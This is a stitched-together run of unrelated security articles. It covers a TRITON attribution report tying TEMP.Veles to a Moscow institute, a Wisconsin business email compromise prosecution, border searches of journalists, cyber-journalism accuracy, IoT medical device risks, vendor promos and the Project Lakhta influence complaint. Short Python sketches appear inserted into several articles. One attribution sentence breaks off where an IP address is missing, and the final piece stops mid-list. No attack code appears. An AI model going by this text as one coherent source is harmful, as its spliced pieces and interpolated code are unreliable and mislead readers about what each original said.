  5. We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.

While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer’s approval, the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute.


Malware Testing Activity Suggests Links between TEMP.Veles and CNIIHM

During our investigation of TEMP.Veles activity, we found multiple unique tools that the group deployed in the target environment. Some of these same tools, identified by hash, were evaluated in a malware testing environment by a single user.

Malware Testing Environment Tied to TEMP.Veles

We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools.

  • At times, the use of this malware testing environment correlates to in-network activities of TEMP.Veles, demonstrating direct operational support for intrusion activity.
    • Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment.
    • TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Soon after, the customized utility was again evaluated in the malware testing environment. The following day, TEMP.Veles again tried the utility on a compromised system.
  • The user has been active in the malware testing environment since at least 2013, testing customized versions of multiple open-source frameworks, including Metasploit, Cobalt Strike, PowerSploit, and other projects. The user’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques.
  • Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software, retrofitted with code used for command and control.

Testing, Malware Artifacts, and Malicious Activity Suggests Tie to CNIIHM

Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM.

  • A PDB path contained in a tested file contained a string that appears to be a unique handle or user name. This moniker is linked to a Russia-based person active in Russian information security communities since at least 2011.
    • The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine (хакер).
    • According to a now-defunct social media profile, the same individual was a professor at CNIIHM, which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow.
    • Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile.
  • Suspected TEMP.Veles incidents include malicious activity originating from, which is registered to CNIIHM.
    • This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities.
    • It also has engaged in network reconnaissance against targets of interest to TEMP.Veles.
    • The IP address has been tied to additional malicious activity in support of the TRITON intrusion.
  • Multiple files have Cyrillic names and artifacts.

Figure 1: Heatmap of TRITON attacker operating hours, represented in UTC time

Behavior Patterns Consistent with Moscow Time Zone

Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow, lending some further support to the scenario that CNIIHM, a Russian research organization in Moscow, has been involved in TEMP.Veles activity.

  • We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target’s network. These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone (Figure 1) supporting a proximity to Moscow.
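The inference from timestamps to time zone is simple: shift the UTC creation times by candidate offsets and see which one produces a plausible office workday. A hypothetical sketch with made-up timestamps (not the actual case data):

```python
from collections import Counter
from datetime import datetime, timezone, timedelta

# Hypothetical file-creation timestamps (UTC) recovered from a victim network.
utc_times = [datetime(2017, 5, d, h, tzinfo=timezone.utc)
             for d in (2, 3, 4) for h in range(5, 14)]

def local_hour_histogram(times, offset_hours):
    """Histogram of local working hours under a candidate UTC offset."""
    tz = timezone(timedelta(hours=offset_hours))
    return Counter(t.astimezone(tz).hour for t in times)

# Under UTC+3 (Moscow), activity at 05:00-13:00 UTC maps to 08:00-16:00 local,
# i.e. a normal office day.
local = local_hour_histogram(utc_times, 3)
```

This is the reasoning behind the heatmap in Figure 1: of all candidate offsets, UTC+3 is the one that makes the attacker's activity look like ordinary business hours.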

Figure 2: Modified service config

  • Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus.
    • A ZIP archive recovered during our investigations contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definition for a masquerading service, 'ProgramDataUpdater.'
    • The malicious installation version has a task name and description in English, while the clean uninstall version has a task name and description in Cyrillic. The timeline of modification dates within the ZIP also suggests the actor changed the Russian version to English in sequential order, heightening the possibility of a deliberate effort to mask its origins (Figure 2).

Figure 3: Central Research Institute of Chemistry and Mechanics (CNIIHM) (Google Maps)

CNIIHM Likely Possesses Necessary Institutional Knowledge and Personnel to Create TRITON and Support TEMP.Veles Operations

While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool. We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.

  • CNIIHM has at least two research divisions that are experienced in critical infrastructure, enterprise safety, and the development of weapons/military equipment:
    • The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts.
    • The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment. It also researches methods for enabling enterprise safety in emergency situations.
  • CNIIHM officially collaborates with other national technology and development organizations, including:
    • The Moscow Institute of Physics and Technology (PhysTech), which specializes in applied physics, computing science, chemistry, and biology.
    • The Association of State Scientific Centers “Nauka,” which coordinates 43 Scientific Centers of the Russian Federation (SSC RF). Some of its main areas of interest include nuclear physics, computer science and instrumentation, robotics and engineering, and electrical engineering, among others.
    • The Federal Service for Technical and Export Control (FTEC), which is responsible for export control, intellectual property, and protecting confidential information.
    • The Russian Academy of Missile and Artillery Sciences (PAPAH), which specializes in research and development for strengthening Russia's defense industrial complex.
  • Information from a Russian recruitment website, linked to CNIIHM’s official domain, indicates that CNIIHM is also dedicated to the development of intelligent systems for computer-aided design and control, and the creation of new information technologies (Figure 4).

Figure 4: CNIIHM website homepage

Primary Alternative Explanation Unlikely

Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval. However, this scenario is highly unlikely.

  • In this scenario, one or more persons – likely including at least one CNIIHM employee, based on the moniker discussed above – would have had to conduct extensive, high-risk malware development and intrusion activity from CNIIHM’s address space without CNIIHM’s knowledge and approval over multiple years.
  • CNIIHM’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity. TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators.

Business Email Compromise: Putting a Wisconsin Case Under the Microscope

Clement Onuama and Orefo Okeke were arrested on November 1, 2017 in the Western District of Texas, on a complaint and warrant from the Western District of Wisconsin charging that the pair were involved in romance scams and business email compromise scams.

This week Okeke was sentenced to 45 months in prison.  Onuama was sentenced on October 30th to 40 months in prison.
Orefo Okeke (image from Dallas News)
Clement Onuama, 53

According to the Criminal Complaint and Indictments from the case, from 2010 until at least December 2016, in the Western District of Wisconsin and elsewhere Clement Onuama and Orefo Okeke knowingly conspired with each other and persons known and unknown to the grand jury, to commit and cause to be committed offenses against the United States, namely: wire fraud, in violation of Title 18, United States Code, Section 1343.

They used romance fraud scams, developing relationships via email, chat apps, and telephone conversations.  Eventually the person posing as the victim's online partner asked each victim for financial assistance. They told the victims that they needed funds in order to release a much larger sum of money that was frozen by a foreign country.

They also used business email compromise scams, primarily sending email messages that altered wire instructions, causing funds to be deposited into accounts controlled by the criminals.  Often these emails were "spoofed" to appear to come from an employee or officer of the victim's company.  During several such scams, the real officer was traveling.

 The deposited funds went into bank accounts of "nominees and shell entities" and were quickly converted to cash and cashier's checks, with a portion of the funds wired overseas.  The criminals also failed to pay taxes on their proceeds.

 $3,259,892 in transfers were attempted and the actual fraud losses were $2,678,328.  The proceeds laundered by Onuama totalled $428,346.  The proceeds laundered by Okeke totalled $538,100.

 Details of the Wisconsin BEC Fraud Scam 

On or about February 19, 2014 at 10:02 am, an email purporting to be from Sarah Smith was sent in reply to real estate agent Terrell Outlay of Madison, Wisconsin, asking him to update wire instructions that had been sent a few days before.  The email had an attachment from Portage County Title, on Portage County Title letterhead, updating the details and indicating funds should be sent to a Wells Fargo Bank account in Bettendorf, Iowa in the name of TJ Hausch.

 $123,747.54 was wired later that day.

 On the same day, a wire transfer from Tammy Hausch's Wells Fargo bank account ending in 9492 sent $80,000 to a Wells Fargo bank account ending in 6411 held by Clement C. Onuama of Grand Prairie, Texas.  Clement withdrew $10,000 in cash that day, $20,000 in cash the following day, and purchased a cashier's check for $28,885 from the account.  On March 11, 2014, a check for $10,000 was sent from Okeke to Onuama, who cashed it.

 An Affidavit from a Treasury Agent shares more details.  Terrell Outlay was a new real estate agent who had recently relocated from Chicago.  Outlay is believed to have had malware planted on his computer in relation to a home sale that he negotiated in January 2014.

After receiving the email instructing him to have his client, Dynasty Holdings, wire $123,747.54 to the TJ Hausch Wells Fargo account, Outlay was contacted by the REAL Sarah Smith on February 25, 2014, who informed him the funds were never received into the BMO Harris account that had been agreed to at closing.  Outlay reported the situation to his boss, who contacted the Madison Police Department.

Although the email of February 19, 2014 appeared to come from Sarah Smith's address, the headers revealed it was sent from a different server, and the actual sending address was different as well.

A second email confirming to Mr. Outlay that the new account should be used -- "Yes!! TJ Hausch Wells Fargo" -- was sent through the same email server, the same IP address, and the same Outlook account.

Four additional pieces of email correspondence used the same IP and return address.  Legitimate emails from Sarah Smith were sent from a Charter Communications IP address, confirmed by subpoena to belong to Portage County Title in Stevens Point, Wisconsin.
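The From/Return-Path mismatch that gave these spoofed messages away can be checked in a few lines with Python's standard library. This is a hypothetical reconstruction: the real addresses are redacted in the case records, so the domains below are invented purely for illustration.

```python
from email.parser import Parser

# Invented example headers modeled on the pattern in the case: the visible
# From line imitates the title company, while Return-Path shows the real origin.
raw = """\
From: Sarah Smith <sarah@portagecountytitle.example>
Return-Path: <sarahsmith1923@outlook.example>
Received: from mail.hosting-provider.example ([203.0.113.45])
Subject: Updated wire instructions
"""

msg = Parser().parsestr(raw, headersonly=True)

# The display From and the envelope Return-Path should normally agree;
# a domain mismatch between them is a classic spoofing tell.
from_domain = msg["From"].split("@")[-1].rstrip(">")
return_path_domain = msg["Return-Path"].split("@")[-1].rstrip(">")

if from_domain != return_path_domain:
    print(f"Suspicious: From={from_domain} vs Return-Path={return_path_domain}")
```

Real investigations also compare the Received chain against the sender's known mail servers, as the subpoenaed Charter Communications records did here.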

The first IP belongs to Sharktech in Chicago, Illinois, and that particular IP address was leased from August 13, 2013 to March 24, 2014 by a Singapore-based company called Surat IT Pte. Ltd. It was used to host hundreds of websites.  The other IP address was confirmed to be a Unified Layer IP address operated by Bluehost.  The customer of record at that time was Hind Jouini of Dubai, UAE.

 The additional funds from the Tammy Hausch account were sent to a Bank of America account ending in 9593 held by P.M. Voss of Costa Mesa, California.

 Tammy Hausch was interviewed by the US Secret Service in Madison, Wisconsin.  She was unaware of the source of the $123,000.  She had actually performed four similar transactions in the past, all at the behest of her online boyfriend, Brian Ward, with whom she had communicated exclusively online.  Brian needed her help because he and his friends had funds that were locked up in Spain and he needed additional funds to pay to have those funds released.

 Hausch had previously received a $12,112 check from the IRS addressed to Brian and Patricia Downing.  "Brian Ward" said that Patricia Downing was the maiden name of his deceased wife.

 Brian Downing was interviewed and reported that when he attempted to file his 2013 taxes, he learned they had already been filed and that an unauthorized tax refund of $12,112 had already been paid to a Wells Fargo account ending in 9492.  He confirmed his wife Patricia was not deceased and introduced her to the agent.

  More BEC Fraud Linked to the Case 

  On August 23, 2016, Anessa Hazelle, the financial controller of Ocean Grove Development of Basseterre, Saint Kitts, West Indies, told the Treasury investigator that on November 30, 2015, an email claiming to be from her supervisor, Nuri Katz, urged her to wire $84,100 to D&D Serv, Inc of Grand Prairie, Texas, to pay an invoice for the purchase of "VxWorks Proll".  Hazelle did as she was instructed and sent the funds.  Katz was on a flight to Russia at the time; after he landed, they had a telephone conversation and learned that the email had been fraudulent.

The spoofed address used for the wire transfer instructions was similar enough to Katz's true email address that Hazelle did not notice the difference.  The funds were sent to a Capital One Bank account ending in 8232.
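The "similar enough not to notice" trick can be flagged programmatically with a simple string-similarity check. A small sketch using Python's standard difflib, with invented addresses standing in for the redacted ones:

```python
import difflib

def lookalike_score(addr_a: str, addr_b: str) -> float:
    """Similarity ratio between two addresses; values near 1.0 are easy to confuse."""
    return difflib.SequenceMatcher(None, addr_a.lower(), addr_b.lower()).ratio()

# Hypothetical stand-ins for the redacted addresses: one character changed.
real_addr = "nkatz@apexcap.example"
fake_addr = "nkatz@apexcqp.example"

score = lookalike_score(real_addr, fake_addr)
if score > 0.9 and real_addr != fake_addr:
    print(f"Likely lookalike pair (similarity {score:.2f})")
```

Mail security gateways apply this kind of comparison against an organization's known contacts to catch exactly the near-duplicate sender addresses used in BEC scams.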

 That Capital One account was opened by Clement C. Onuama d/b/a D&D Serv, Inc, of 2621 Skyway Drive, Grand Prairie, Texas.  Onuama was the sole signatory on the account.

 On July 26, 2016, Daniel Yet, the owner of D&T Foods of Santa Clara, California, relayed a similar experience.  His personal investment account at TD Ameritrade was managed by Bao Vu.  On June 29, 2015, while Yet was traveling overseas on vacation, Vu attempted to contact him to verify a wire transfer request sending $22,000 to a Regions Bank account ending in 6870 for Sysco Serve.  Since Vu could not reach Yet, and the matter had been described as urgent, Vu went ahead with the wire.  A SECOND request came through asking for an additional $30,000 to be sent.

 The Regions Bank account ending in 6870 was opened by Orefo S. Okeke d/b/a Sysco Serve, with the same address as the Capital One account controlled by Onuama above, 2621 Skyway Drive, Grand Prairie, Texas!

 The 6870 Regions account made a payment of $15,000 on July 1, 2015 (two days after the deposit from Mr. Yet's TD Ameritrade account) to another Regions Bank account ending in 6452.

 The 6452 Regions account was opened by Clement C. Onuama d/b/a D&D Serv, of 2621 Skyway Drive, Grand Prairie, Texas.

  Letters from Okeke

  The defense entered seven letters to be considered during the sentencing hearing.  In the first, Orefo explains that when he first came to America, he made a business of buying used American cars and reselling them in Nigeria.  He ended up in financial hardship, which he blames partly on medical bills for his sick father and partly on caring for his wife and two stepchildren.  He was approached by others in Nigeria who needed his assistance in converting US dollars to Nigerian Naira.

 The other letters explained how Orefo was kind enough to hire a convicted felon to work for him, and a disabled veteran.  One letter, from his Aunty, says he is kind and loves animals. His wife begs the mercy of the courts and explains how much her children miss him.  Okeke's brother in South Africa explains to the judge that his brother is an honest God-fearing man and that his pleading guilty demonstrates his honesty, and that this trial caused the death of their father and now their mother's health is also on the line. His uncle writes how sad it is that the judge has incarcerated his nephew for a non-violent first time offense causing him to miss his sister's wedding and his father's funeral.  A friend explains Okeke's very good moral character and how he always operates with integrity.

 On the other hand, the FBI says that Business Email Compromise has stolen $12 billion, and that just from June 2016 to May 2018 they have identified 30,787 victims, 19,335 of them in the United States.  Records from October 2013 to May 2018 actually show at least 119,675 victims!  Hopefully the examples shared above will help us understand how these people come to be victims -- often losing their entire life savings, or funds whose loss leaves them no longer able to buy a house or continue operating a business.

The best enterprise level firewalls: Rating 10 top products

You know you need to protect your company from unauthorized or unwanted access. You need a network-security tool that examines the flow of packets in and out of the enterprise, governed by rules that decide whether that flow is safe, malicious or questionable and in need of inspection. You need a firewall.
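At its core, the rule-governed decision described above reduces to first-match evaluation of a rule table. A minimal illustrative sketch (toy rules in Python, not any vendor's actual rule format):

```python
import ipaddress

# Toy rule table: (action, source network, destination port).
# First matching rule wins; anything unmatched falls through to the default.
RULES = [
    ("allow", ipaddress.ip_network("10.0.0.0/8"), 22),   # SSH from the inside only
    ("deny",  ipaddress.ip_network("0.0.0.0/0"), 22),    # block external SSH
    ("allow", ipaddress.ip_network("0.0.0.0/0"), 443),   # HTTPS from anywhere
]

def decide(src_ip: str, dst_port: int, default: str = "deny") -> str:
    src = ipaddress.ip_address(src_ip)
    for action, network, port in RULES:
        if src in network and dst_port == port:
            return action
    return default

print(decide("10.1.2.3", 22))      # internal SSH -> allow
print(decide("198.51.100.7", 22))  # external SSH -> deny
```

Real next-generation firewalls layer application awareness, user identity, and threat intelligence on top of this basic match-and-act loop, which is where the product differences discussed below come in.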

Recognizing that you need a firewall is the first -- and most obvious -- step. The next crucial step in the decision-making process is determining which firewall features and policies best suit your company's needs.

Today’s enterprise firewalls must be able to secure an increasingly complex network that includes traditional on-premises data center deployments, remote offices and a range of cloud environments. Then you have to implement and test the firewall once it's installed. Perhaps the only element more complex than configuring, testing and managing a next-generation firewall is the decision-making process regarding which product to trust with your enterprise security.

Important new report sheds light on the US government’s border stops of journalists

Reuters/Patrick T. Fallon

Sometimes, journalists’ stories take them across borders. But when journalists are targeted for interrogation about their work or are pressured into handing over their devices, they must go to extra lengths to protect their sources and reporting. A new report by the Committee to Protect Journalists (CPJ) sheds light on officials’ unacceptable targeting of reporters at the border.

CPJ identified 37 journalists who found secondary screenings by Customs and Border Protection (CBP) to be invasive. Out of that group, 30 said they were questioned about their reporting, and 20 of them said their electronic devices were searched by border officers without a warrant. Between 2006 and June 2018, the 37 journalists were collectively stopped for screenings more than 110 times.

In several instances, United States border agents have demanded passwords to unlock journalists’ devices, which often contain sensitive information about stories and sources, as a condition of entry into the United States. Some journalists, like photojournalist David Devgen, have opted to surrender their passwords rather than have their devices confiscated. Journalist Ali Lafti unlocked his phone for CBP, believing he did not have a choice, and cultural reporter Anne Elizabeth Moore complied when border agents asked her to leave her phone on and unlocked on the dashboard of her car.

Others, like Canadian journalist Ed Ou, refuse to provide the passwords to their devices and are denied entry into the country altogether. That journalists are forced to choose between their privacy and protecting both the integrity of their reporting and their ability to report out a story is outrageous, and not a real choice at all.

In many of the cases included in CPJ’s report, journalists did not feel that they fully understood their rights, and whether they could refuse to surrender their devices or passwords. Ed Ou said that he was not prepared for what happened in the United States, which he had thought protected press freedom and freedom of expression.

CBP has broad authority to conduct searches at the border, including without a warrant.

“Courts have so far upheld the so-called “border exception” to the Fourth Amendment’s requirement that authorities obtain a warrant to search people and their belongings,” CPJ’s report reads. “But legal challenges are being mounted over whether physical objects—such as laptops and phones—and the digital information contained on these devices should be treated the same way.”

Senators have proposed two bills that would move to rein in CBP’s sweeping powers relating to device searches of U.S. citizens and permanent residents. The Protecting Data at the Border Act would require CBP to obtain a warrant for searches of Americans’ devices, and the Leahy-Daines Bill would prohibit border officers from conducting searches without first meeting a standard of reasonable suspicion.

Legislation that would protect the rights of American journalists at the border is critical, and these bills should be adopted (preferably the stronger Protecting Data at the Border Act). But oftentimes, it’s non-American journalists that are the most vulnerable at the border, who may have less legal support, and are perhaps less likely to know their rights in the United States. No journalist, American or not, should face threats to their reporting at the border, and the civil liberties and privacy of journalists who are not citizens or permanent residents are no less important.

The 37 cases explored by CPJ are a small subset of the millions of people, likely including thousands of journalists, who enter and leave the United States every year. So while it is impossible to draw firm conclusions about trends from them, border stops in general have increased under the Trump administration.

U.S. Customs and Border Protection reported in April of last year that searches increased from 8,500 in fiscal year 2015 to about 19,000 in fiscal year 2016, with another 15,000 conducted in just the first half of 2017. CPJ’s report has shed light on CBP’s dangerous treatment of journalists doing their jobs, in the context of the agency’s increasingly disturbing privacy violations.

Secondary screenings that target journalists traveling for work are deeply concerning and threaten to undermine press freedom. As federal agencies ramp up warrantless searches of devices at the border, the protection of journalists’ digital lives and the work of civil liberties groups has never been more important.

Some notes for journalists about cybersecurity

The recent Bloomberg article about Chinese hacking motherboards is a great opportunity to talk about problems with journalism.

Journalism is about telling the truth: not a close approximation of the truth, but the true truth. Journalists don't do a good job at this in cybersecurity.

Take, for example, a recent incident where the Associated Press fired a reporter for photoshopping his shadow out of a photo. The AP took a scorched-earth approach, not simply firing the photographer, but removing all his photographs from their library.

That's because there is a difference between truth and near truth.

Now consider Bloomberg's story, such as a photograph of a tiny chip. Is that a photograph of the actual chip the Chinese inserted into the motherboard? Or is it another chip, representing the size of the real chip? Is it truth or near truth?

Or consider the technical details in Bloomberg's story. They are garbled, as this discussion shows. Something like what Bloomberg describes is certainly plausible; something exactly like what Bloomberg describes is impossible. Again there is the question of truth vs. near truth.

There are other near truths involved. For example, we know that supply chains often replace high-quality expensive components with cheaper, lower-quality knockoffs. It's perfectly plausible that some of the incidents Bloomberg describes are instances of that known issue, which they are then hyping as hacker chips. This demonstrates how truth and near truth can be quite far apart, telling very different stories.

Another example is a NYTimes story about a terrorist's use of encryption. As I've discussed before, the story has numerous "near truth" errors. The NYTimes story is based upon a transcript of an interrogation of the hacker. The French newspaper Le Monde published excerpts from that interrogation, with details that differ slightly from the NYTimes article.

One of the justifications journalists use is that near truth is easier for their readers to understand. First of all, that's no justification for falsehoods. If the words mean something else, then it's false; it doesn't matter if it's simpler. Secondly, I'm not sure near truths actually are easier to understand. It's still techy gobbledygook. In the Bloomberg article, if I as an expert can't figure out what actually happened, then I know the average reader can't either, no matter how much the language has been "simplified".

Stories can solve this by both giving the actual technical terms that experts can understand, then explain them. Yes, it eats up space, but if you care about the truth, it's necessary.

In groundbreaking stories like Bloomberg's, the length is already enough that the average reader won't slog through it. Instead, it becomes a seed for lots of other coverage that explains the story. In such cases, you want to get the techy details, the actual truth, correct, so that we experts can stand behind the story and explain it. Otherwise, going for the simpler near truth means that all us experts simply question the veracity of the story.

The companies mentioned in the Bloomberg story have called it an outright lie. However, the techniques roughly are plausible. I have no trouble believing something like that has happened at some point, that an intelligence organization subverted chips to hack BMC controllers in servers destined for specific customers. I'm sure our own government has done this at least once, as Snowden leaked documents imply. However, that doesn't mean the Bloomberg story is truthful. We know they have smudged details. We know they've hyped details, like the smallness of the chips involved.

This is why I trust the high-tech industry press so much more than the mainstream press. Despite priding itself as the "newspaper of record", on these technical issues the NYTimes is anything but. It's the techy sites like Ars Technica and sometimes Wired that become the "paper of record" on things cyber. I mention this because David Sanger gets all the credit for Stuxnet reporting when he's done a horrible job, while numerous techy sites have done the actual work figuring out what went on.

The Connection Between IoT and Consumers’ Physical Health

When we think about how technology impacts our daily lives, we don’t really notice it unless it’s a big-picture concept. In fact, there are many areas where technology has an outsized impact on our lives — and we hardly notice it at all. Traffic lights can be controlled remotely; thermostats can automatically warm or chill your home based on the season. The truth is, these small individual facets add up to a larger whole: the Internet of Things, or IoT. IoT applications are endless, but can sometimes be insecure. Imagine if that were the case with the IoT devices designed to aid our personal health.

IoT and our physical health are more related than many of us think, and their connection has led to revolutionary, preventative health care. Smartwatches monitor our overall health and fitness level thanks to miniaturized gyroscopes and heart rate monitors. This information can and has been used to warn people of impending heart attacks — giving them enough time to contact emergency services for help. Implants, such as pacemakers, can monitor a patient from afar, giving doctors a detailed analysis of their condition. These devices have advanced modern-day health care for the better, but their design can occasionally contain vulnerabilities that may expose users to a cyberattack.

First, let’s consider the smartwatch. It’s a convenient tool that aids us in monitoring our daily well-being. But the data it collects could be compromised through a variety of attacks. For example, Fitbit suffered a minor breach in 2016, resulting in cybercriminals trying to scam the company’s refund system. In another example, Strava, a social network for athletes, saw its users suffer a spate of thefts — a potential consequence of sharing GPS coordinates from their IoT device.

Alternatively, flaws found in implants, such as pacemakers and cochlear implants, can be leveraged by cybercriminals to conduct attacks that impact our physical well-being. That’s because many implants today can be remotely manipulated, potentially giving cybercriminals the tools they need to cause a patient physical harm. For example, a recent study from academic researchers at the Catholic University of Leuven found neurostimulators, brain implants designed to help monitor and personalize treatments for people living with Parkinson’s disease, are vulnerable to remote attack. If an attack were successful, a cybercriminal could prevent a patient from speaking or moving.

Remember, these IoT implants still do a lot more good than harm, as they give medical professionals unparalleled insights into a patient’s overall condition and health. They could also help design better treatments in the future. However, in order to be able to reap their benefits in a safe way, users just need to make sure they take proactive security steps before implementing them.

Before introducing an IoT device for health care into your life, make sure you take the time to do your research. Look up the device in question and its manufacturer to see if the device had any prior breaches, and the manufacturer’s actions or responses to that. Speak with your doctor about the security standards around the IoT implant, as well. Ask if its security has been tested, how it’s been tested and how an implant can be updated to patch any security-related issues. After all, technology is becoming a more significant part of our lives — we owe it to ourselves to secure it so we can enjoy the benefits it brings to the table.

To learn more about securing your IoT devices from cyberattacks, be sure to follow us at @McAfee and @McAfee_Home.

The post The Connection Between IoT and Consumers’ Physical Health appeared first on McAfee Blogs.

Quick Take: Chris Eng On The Security Practitioner’s Role In The Future Of Secure Software Development

Veracode State of Software Security Chris Eng Video

The State of Software Security Volume 9 highlights that the sheer volume of open flaws within enterprise applications is too staggering to tackle at once, which means that organizations need to find effective ways to prioritize which flaws they fix first. While many organizations are doing a good job prioritizing by flaw severity, data this year shows that they’re not effectively considering other risk factors such as the criticality of the application or exploitability of flaws. One school of thought is that application security practitioners need to step in to help developers most effectively prioritize their fixes. In this quick take video, Chris Eng looks at the security practitioner's role in releasing secure software.


To learn more and read the full report, visit

Quick Take: Advancing AppSec Requires a Partnership Between Security and Development

The State of Software Security Volume 9 shows that the speed at which organizations fix flaws they discover in their code directly mirrors the level of risk incurred by applications. The faster organizations close vulnerabilities, the less risk software poses over time. In this quick take video, Chris Wysopal discusses how security and development teams can work together to reduce application security risk.


To learn more and read the full report, visit

Quick Take: The State of Software Security in 2018

The State of Software Security Volume 9 looks at both the good and bad news about the enterprise's progress on advancing application security. The data offers many signs of encouragement that organizations are incrementally moving the needle, though there is still plenty of work to be done to shore up application risk. In this quick take video, Chris Wysopal shares his views on the state of software security in 2018.


To read the full report, visit

DisruptOps: How S3 Buckets Become Public, and the Fastest Way to Find Yours

How S3 Buckets Become Public, and the Fastest Way to Find Yours

In What Security Managers Need to Know About Amazon S3 Exposures we mentioned that one of the reasons finding public S3 buckets is so darn difficult is because there are multiple, overlapping mechanisms in place that determine the ultimate amount of S3 access. To be honest, there’s a chance I don’t even know all the edge cases, but this list should cover the vast majority of situations.
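As a rough illustration of why overlapping mechanisms make this hard, here is a deliberately simplified model (my own sketch, not AWS's actual policy-evaluation logic) of how bucket ACLs, bucket policies, and the Block Public Access setting combine:

```python
def is_effectively_public(acl_public: bool, policy_public: bool,
                          block_public_access: bool) -> bool:
    """Simplified model: either the ACL or the bucket policy can open a
    bucket up, but Block Public Access overrides both when enabled."""
    if block_public_access:
        return False
    return acl_public or policy_public

# The override is the important part:
print(is_effectively_public(acl_public=True, policy_public=True,
                            block_public_access=True))   # False: override wins
print(is_effectively_public(acl_public=False, policy_public=True,
                            block_public_access=False))  # True: policy opens it
```

The real evaluation involves more layers (object ACLs, account-level settings, access points), which is exactly why auditing exposure mechanism-by-mechanism is so error-prone.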

Read the full post at DisruptOps

- Rich

Project Lakhta: Putin’s Chef spends $35M on social media influence

Project Lakhta is the name of a Russian project that was further documented by the Department of Justice last Friday in the form of sharing a Criminal Complaint against Elena Alekseevna Khusyaynova, said to be the accountant in charge of running a massive organization designed to inject distrust and division into the American elections and American society in general.
In a fairly unusual step, the 39-page Criminal Complaint against Khusyaynova, filed just last month in Alexandria, Virginia, has already been unsealed, prior to any indictment or specific criminal charges being brought against her before a grand jury.  US Attorney G. Zachary Terwilliger says "The strategic goal of this alleged conspiracy, which continues to this day, is to sow discord in the U.S. political system and to undermine faith in our democratic institutions."

The data shared below, intended to summarize the 39 page criminal complaint, contains many direct quotes from the document, which has been shared by the DOJ. ( Click for full Criminal Complaint against Elena Khusyaynova )

The complaint shows that since May 2014 the following organizations were used as cover to spread distrust toward candidates for political office and the political system in general:

Internet Research Agency LLC ("IRA")
Internet Research LLC
MediaSintez LLC
GlavSet LLC
MixInfo LLC
Azimut LLC
NovInfo LLC
Nevskiy News LLC ("NevNov")
Economy Today LLC
National News LLC
Federal News Agency LLC ("FAN")
International News Agency LLC ("MAN")

These entities employed hundreds of individuals in support of Project Lakhta's operations with an annual global budget of millions of US dollars.  Only some of their activity was directed at the United States.

Prigozhin and Concord 

Concord Management and Consulting LLC and Concord Catering (collectively referred to as "Concord") are related Russian entities with various Russian government contracts.  Concord was the primary source of funding for Project Lakhta, controlling funding, recommending personnel, and overseeing activities through reporting and interaction with the management of various Project Lakhta entities.

Yevgeniy Viktorovich Prigozhin is a Russian oligarch closely identified with Russian President Vladimir Putin.  He began his career in the food and restaurant business and is sometimes referred to as "Putin's Chef."  Concord has Russian government contracts to feed school children and the military.

Prigozhin was previously indicted, along with twelve others and three Russian companies, with committing federal crimes while seeking to interfere with the US elections and political process, including the 2016 presidential election.

Project Lakhta internally referred to their work as "information warfare against the United States of America" which was conducted through fictitious US personas on social media platforms and other Internet-based media.

Lakhta has a management group which organized the project into departments, including a design and graphics department, an analysts department, a search-engine optimization ("SEO") department, an IT department and a finance department.

Khusyaynova has been the chief accountant of Project Lakhta's finance department since April 2014, with responsibility for the budgets of most or all of the previously named organizations.  She submitted hundreds of financial vouchers, budgets, and payment requests for the Project Lakhta entities.  The money was managed through at least 14 bank accounts belonging to various Project Lakhta affiliates, including:

Glavnaya Liniya LLC
Merkuriy LLC
Obshchepit LLC
Potentsial LLC
Kompleksservis LLC
SPb Kulinariya LLC
Almira LLC
Pishchevik LLC
Galant LLC
Rayteks LLC
Standart LLC

Project Lakhta Spending 

Monthly reports on spending were provided by Khusyaynova to Concord for at least the period from January 2016 through July 2018.

A document sent in January 2017 included the projected budget for February 2017 (60 million rubles, or roughly $1 million USD), and an accounting of spending for all of calendar 2016 (720 million rubles, or $12 million USD).  Expenses included:

Registration of domain names
Purchasing proxy servers
Social media marketing expenses, including:
 - purchasing posts for social networks
 - advertisements on Facebook
 - advertisements on VKontakte
 - advertisements on Instagram
 - promoting posts on social networks

Other expenses were for activists, bloggers, and people who "developed accounts" on Twitter to promote online videos.

In January 2018, the "annual report" for 2017 showed 733 million Russian rubles of expenditure ($12.2M USD).

More recent expenses, between January 2018 and June 2018, included more than $60,000 in Facebook ads, and $6,000 in Instagram ads, as well as $18,000 for Bloggers and Twitter account developers.

Project Lakhta Messaging

From December 2016 through May 2018, Lakhta analysts and activists spread messages "to inflame passions on a wide variety of topics" including:
  • immigration
  • gun control and the Second Amendment 
  • the Confederate flag
  • race relations
  • LGBT issues 
  • the Women's March 
  • and the NFL national anthem debate.

